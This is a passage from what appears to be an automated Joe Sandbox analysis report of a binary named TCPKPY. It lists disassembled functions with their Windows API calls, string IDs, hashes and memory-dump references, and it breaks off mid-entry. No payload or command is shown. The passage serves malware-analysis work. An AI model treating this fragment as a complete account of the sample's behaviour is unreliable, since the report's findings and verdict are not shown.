                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID: SysTreeView32
                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                • Opcode ID: 37ea4e8f78c47d534490958364c413532fc80039f561080d1f340b2fa5552a3a
                                                                                                                • Instruction ID: 6af67ade2aeb92c8c0d1f300e4da0a00c7701cf7de92b3a35a2737b072468dde
                                                                                                                • Opcode Fuzzy Hash: 37ea4e8f78c47d534490958364c413532fc80039f561080d1f340b2fa5552a3a
                                                                                                                • Instruction Fuzzy Hash: E131B235520206AFDB219F38DC45BEA7BA9FB49324F204715F875A31E1D770E8A09B51
                                                                                                                Function 002557D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 002557E7
                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0025581D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CrackInternet_memset
                                                                                                                • String ID: ?K%$|
                                                                                                                • API String ID: 1413715105-1067147212
                                                                                                                • Opcode ID: ba900573a859689484410500f3dbf6a3f52719eb11fae100bc9e8ee010e4b901
                                                                                                                • Instruction ID: 920e28504886771b40b816eac2359586890c7d6a75f21cf4d18fd3891ea5e519
                                                                                                                • Opcode Fuzzy Hash: ba900573a859689484410500f3dbf6a3f52719eb11fae100bc9e8ee010e4b901
                                                                                                                • Instruction Fuzzy Hash: CB310C71920229ABCF11AFA0DC95DEF7FB9FF18310F104055F815A6162DB31996ADF60
                                                                                                                Function 00269EE3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00269F6B
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00269F7F
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00269FA3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: SysMonthCal32
                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                • Opcode ID: 2b3ea2a11845fb39fb6e2475e557f81e11d8b6015a987a1766c03b20b8a4cdd3
                                                                                                                • Instruction ID: 4d0ca5f99f7b2d7aa8778c6bdaae8e013afa1b4a6c42f07ffe014bca65b1bb18
                                                                                                                • Opcode Fuzzy Hash: 2b3ea2a11845fb39fb6e2475e557f81e11d8b6015a987a1766c03b20b8a4cdd3
                                                                                                                • Instruction Fuzzy Hash: 6921E532520219BBDF118F54DC46FEA3B79EF58714F120214FA15BB1D0DAB1E8A09B90
                                                                                                                Function 0026A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0026A74F
                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0026A75D
                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0026A764
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                • String ID: msctls_updown32
                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                • Opcode ID: ba3afb0f9a729e6733bac1f3c6d7458b443f5ee100415f642b7e8ef4b0c41f40
                                                                                                                • Instruction ID: e4207bf65f69471ffe886db082c8742d142b4a1e834b3f2d24662d098b1920ef
                                                                                                                • Opcode Fuzzy Hash: ba3afb0f9a729e6733bac1f3c6d7458b443f5ee100415f642b7e8ef4b0c41f40
                                                                                                                • Instruction Fuzzy Hash: F921B5B5610205AFEB11DF68DCC5EAB77ACEF4A394B140159F90197252C770EC61CF61
                                                                                                                Function 002697B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0026983D
                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0026984D
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00269872
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                • Opcode ID: 10019823b30f71a4be10e47607e221a8d416224da5a504c523cef5dc5429ffda
                                                                                                                • Instruction ID: 7393cba6b656fda82041babc2c52d5c6f4f99324152f7a944eb4ce5272ba5f03
                                                                                                                • Opcode Fuzzy Hash: 10019823b30f71a4be10e47607e221a8d416224da5a504c523cef5dc5429ffda
                                                                                                                • Instruction Fuzzy Hash: 0221D771620119BFEF128F54DC85FFB3BAEEF8A754F118124F9045B190CA719CA18BA0
                                                                                                                Function 0026A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0026A27B
                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0026A290
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0026A29D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                • Opcode ID: 873e4a5d46aa11e403c889ea29b12c14774f1d4c37639e95a061109be8de8913
                                                                                                                • Instruction ID: 696cefc890df7ee64f0e348e632c7c0c19b4872054b3c6fec12e9ac26c0ef61d
                                                                                                                • Opcode Fuzzy Hash: 873e4a5d46aa11e403c889ea29b12c14774f1d4c37639e95a061109be8de8913
                                                                                                                • Instruction Fuzzy Hash: 7911E771250209BBEF205F75DC46FE73BA8EF89B54F114118FA45A6091D27298A1CF60
                                                                                                                Function 00222F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00223028,?), ref: 00222F79
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00222F80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RoInitialize$combase.dll
                                                                                                                • API String ID: 2574300362-340411864
                                                                                                                • Opcode ID: a37625a993ef946bc4560fa6f32d761acf46b3d74d3afc045eefa5a7f1af7970
                                                                                                                • Instruction ID: 4eb31ba9d7a53c1ab2332796b060a1fbcb4deaed65469af39c5f6a0859b67781
                                                                                                                • Opcode Fuzzy Hash: a37625a993ef946bc4560fa6f32d761acf46b3d74d3afc045eefa5a7f1af7970
                                                                                                                • Instruction Fuzzy Hash: E1E0E5786A5305FADF206F70FDCEF157664AB01706F540424B10AD10E0CBB58458DB04
                                                                                                                Function 00223034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00222F4E), ref: 0022304E
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00223055
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RoUninitialize$combase.dll
                                                                                                                • API String ID: 2574300362-2819208100
                                                                                                                • Opcode ID: a083817ba08a3956a2252c1fbb2c69d98f04c6d9e1413a74e3c849e88fd8807d
                                                                                                                • Instruction ID: e4aa4835f985f88b46ce62fe50f37b9a9760ee40ade943664a3e2b997f1ae33b
                                                                                                                • Opcode Fuzzy Hash: a083817ba08a3956a2252c1fbb2c69d98f04c6d9e1413a74e3c849e88fd8807d
                                                                                                                • Instruction Fuzzy Hash: 22E09278666205EBDB20AFA1BD8DF057A64B700702F140514F10D910F0CBB885188B14
                                                                                                                Function 0027BA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime__swprintf
                                                                                                                • String ID: %.3d$WIN_XPe
                                                                                                                • API String ID: 2070861257-2409531811
                                                                                                                • Opcode ID: 1370740391a035bcccae6aee36bf3b36f2b3072368dc6c073edc6011f2b929b3
                                                                                                                • Instruction ID: 867e4d0230a629f05de3cb5bedec120b46cf745287bbe3af8d3d6d90b11c414b
                                                                                                                • Opcode Fuzzy Hash: 1370740391a035bcccae6aee36bf3b36f2b3072368dc6c073edc6011f2b929b3
                                                                                                                • Instruction Fuzzy Hash: 65E0EC7183911CFACB16EB909C46AFA73BCAB04300F148492BD1A91044D3759B78AB11
                                                                                                                Function 0021E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0021E69C,75570AE0,0021E5AC,0029DC28,?,?), ref: 0021E6B4
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0021E6C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                • Opcode ID: 1f72e584e650a2b51a2563f61b9133b48754264c4ff534e65e8173f13fff0e2e
                                                                                                                • Instruction ID: 8ded11af3ebd73f4e8740430f4bddd9ec4c1df9c411858dadf4a51f3c6fc4f1c
                                                                                                                • Opcode Fuzzy Hash: 1f72e584e650a2b51a2563f61b9133b48754264c4ff534e65e8173f13fff0e2e
                                                                                                                • Instruction Fuzzy Hash: 5BD0A738420313DFDB215F31FC0C68237D8AF34702B415419E949D21A0D770D4D4C710
                                                                                                                Function 0021E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0021E6D9,?,0021E55B,0029DC28,?,?), ref: 0021E6F1
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0021E703
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                • API String ID: 2574300362-3024904723
                                                                                                                • Opcode ID: e154729b97c67a6f9fd15e3aa32c776b482558ae6dc13a4ec6bfca713cd2d481
                                                                                                                • Instruction ID: c4da1d707e47a2658b67e6bd0428d8ce7f3552639841e8b68b7dc3a1fed4ae0a
                                                                                                                • Opcode Fuzzy Hash: e154729b97c67a6f9fd15e3aa32c776b482558ae6dc13a4ec6bfca713cd2d481
                                                                                                                • Instruction Fuzzy Hash: A7D0A738420313DFEB242F21FC4C6837BD4BF16701B014519E899D21D0D770D4D48710
                                                                                                                Function 0025EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0025EBAF,?,0025EAAC), ref: 0025EBC7
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0025EBD9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                • Opcode ID: c9193e540de14e089da6ae15801552da955699339234a83e1d8360f0b92182da
                                                                                                                • Instruction ID: 15bad564360790640518ece5152ea71401aa9d6327d79bc56f318135f0a99bb4
                                                                                                                • Opcode Fuzzy Hash: c9193e540de14e089da6ae15801552da955699339234a83e1d8360f0b92182da
                                                                                                                • Instruction Fuzzy Hash: 50D0A7384243139FDF202F31F88CA4177E4BF0470BB519419F85AD1190DB70D8988710
                                                                                                                Function 0024137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,0024135F,?,00241440), ref: 00241389
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 0024139B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                • API String ID: 2574300362-1071820185
                                                                                                                • Opcode ID: 525b411ff7fea47607973cfc64eb9f22b1b1ef178319e7fd03f95f1b7b71644a
                                                                                                                • Instruction ID: 2acc573fee407ac6c3a84c80324e2f1433df9962e75e6610b1c631088295ad40
                                                                                                                • Opcode Fuzzy Hash: 525b411ff7fea47607973cfc64eb9f22b1b1ef178319e7fd03f95f1b7b71644a
                                                                                                                • Instruction Fuzzy Hash: B0D0A734820713AFD7205F24FC0C7813BD4AF04745F044859E489D19D0D670D4E48710
                                                                                                                Function 002413A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00241371,?,00241519), ref: 002413B4
                                                                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 002413C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                • API String ID: 2574300362-1587604923
                                                                                                                • Opcode ID: 3eb754fbf71cc50dff1edd44676dc802922227908d7de44be7f24fdadbdb1179
                                                                                                                • Instruction ID: 1d796668ae4d059d9a20325d6306048ca2217324ae61300ac4e5ce0129b442cd
                                                                                                                • Opcode Fuzzy Hash: 3eb754fbf71cc50dff1edd44676dc802922227908d7de44be7f24fdadbdb1179
                                                                                                                • Instruction Fuzzy Hash: 80D0A735825313AFD7245F24FC4C6513BE8AF40705F004459F49AD15A0EA70C4E48710
                                                                                                                Function 00263ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,00263AC2,?,00263CF7), ref: 00263ADA
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00263AEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                • API String ID: 2574300362-4033151799
                                                                                                                • Opcode ID: 963dc382850dec65998be5f7ba7b7eb2333c396d855188b76610683b5a0611d8
                                                                                                                • Instruction ID: e7634fb9d0b9608df1835f312959e6a3148db45c9e75d75a8826c3032210cfd6
                                                                                                                • Opcode Fuzzy Hash: 963dc382850dec65998be5f7ba7b7eb2333c396d855188b76610683b5a0611d8
                                                                                                                • Instruction Fuzzy Hash: 0AD0A935421323AFD720AFA0F88DA8277E8AF12706B10842DE4D9D2290EFF0C8D0CB10
                                                                                                                Function 00203EC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00203EBB,?,00203E91,?), ref: 00203ED3
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00203EE5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
